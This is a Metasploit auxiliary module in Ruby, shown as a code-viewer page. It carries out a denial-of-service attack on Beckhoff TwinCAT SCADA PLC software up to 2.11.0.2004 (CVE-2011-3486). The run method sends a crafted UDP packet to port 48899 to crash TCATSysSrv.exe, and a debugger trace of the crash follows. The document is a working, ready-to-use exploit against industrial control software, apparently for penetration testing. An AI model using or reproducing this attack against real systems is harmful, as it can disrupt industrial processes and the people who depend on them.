Path: blob/master/modules/auxiliary/dos/scada/beckhoff_twincat.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Udp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS',14'Description' => %q{15The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending16a crafted UDP packet to port 48899 (TCATSysSrv.exe).17},18'Author' => [19'Luigi Auriemma', # Public exploit20'jfa', # Metasploit module21],22'License' => MSF_LICENSE,23'References' => [24[ 'CVE', '2011-3486' ],25[ 'OSVDB', '75495' ],26[ 'URL', 'http://aluigi.altervista.org/adv/twincat_1-adv.txt' ]27],28'DisclosureDate' => '2011-09-13',29'Notes' => {30'Stability' => [CRASH_SERVICE_DOWN],31'SideEffects' => [],32'Reliability' => []33}34)35)3637register_options([Opt::RPORT(48899)])38end3940def run41dos = "\x03\x66\x14\x71" + "\x00" * 16 + "\xff" * 151442connect_udp43print_status('Sending DoS packet ...')44udp_sock.put(dos)45disconnect_udp46end47end4849=begin500:017> g51(4d4.850): Access violation - code c0000005 (first chance)52First chance exceptions are reported before any exception handling.53This exception may be expected and handled.54eax=02a1f9cf ebx=0037c0a8 ecx=02a0f9cc edx=ffffffff esi=02a0f9b4 edi=0000000155eip=00414f6a esp=02a0f7bc ebp=0000ffff iopl=0 nv up ei pl nz ac po cy56cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=0001021357*** ERROR: Module load completed but symbols could not be loaded for C:\TwinCAT\TCATSysSrv.exe58TCATSysSrv+0x14f6a:5900414f6a 66833802 cmp word ptr [eax],2 ds:0023:02a1f9cf=????600:016> k61ChildEBP RetAddr62WARNING: Stack unwind information not available. Following frames may be wrong.6302a0f7f8 71ab265b TCATSysSrv+0x14f6a6402a0f80c 71ab4a9e WS2_32!Prolog_v1+0x216502a0f834 7c90df3c WS2_32!WPUQueryBlockingCallback+0x1b6602a0f880 71a5332f ntdll!NtWaitForSingleObject+0xc6702a0f8f4 71abf6e7 mswsock!WSPRecvFrom+0x35c6802a0f938 71ad303a WS2_32!WSARecvFrom+0x7d6902a0f96c 00414b92 WSOCK32!recvfrom+0x397002a0f988 00000000 TCATSysSrv+0x14b9271=end727374